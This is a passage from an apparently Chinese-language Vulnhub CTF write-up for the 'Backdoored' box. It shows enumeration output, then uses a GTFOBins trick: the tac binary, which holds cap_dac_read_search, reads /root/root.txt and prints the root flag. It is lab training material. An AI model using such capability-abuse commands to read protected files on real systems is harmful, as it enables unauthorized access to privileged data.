2020-08-09 21:58:57 status installed [1;31mpassw[0md:amd64 1:4.5-1.1
2020-08-09 21:58:57 status unpacked [1;31mpassw[0md:amd64 1:4.5-1.1
Description: Set up users and [1;31mpassw[0mords
dmidecode: Administrator Password Status: Enabled
dmidecode: Keyboard Password Status: Unknown
dmidecode: Power-On Password Status: Disabled
[1;34m ╔════════════════╗
════════════════════════════════╣ [1;32mAPI Keys Regex[1;34m ╠════════════════════════════════
[1;34m ╚════════════════╝[0m
Regexes to search for API keys aren't activated, use param '-r'
其中:
iles with capabilities (limited to 50):
/usr/bin/ping =cap_net_raw+ep
/usr/bin/tac =cap_dac_read_search+ep
查询GTFOBINS网站
"""
File read
It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
-
LFILE=file_to_read tac -s 'RANDOM' "$LFILE""
bob@backdoored
:/tmp# tac -s 'RANDOM' "/root/root.txt"
395fdad197a5386ea3f8d02143f3fb75
成功读取root flag.
标签:Backdoored,--,2020,usr,靶机,0m,root,..........,Vulnhub From: https://www.cnblogs.com/jason-huawen/p/16865398.html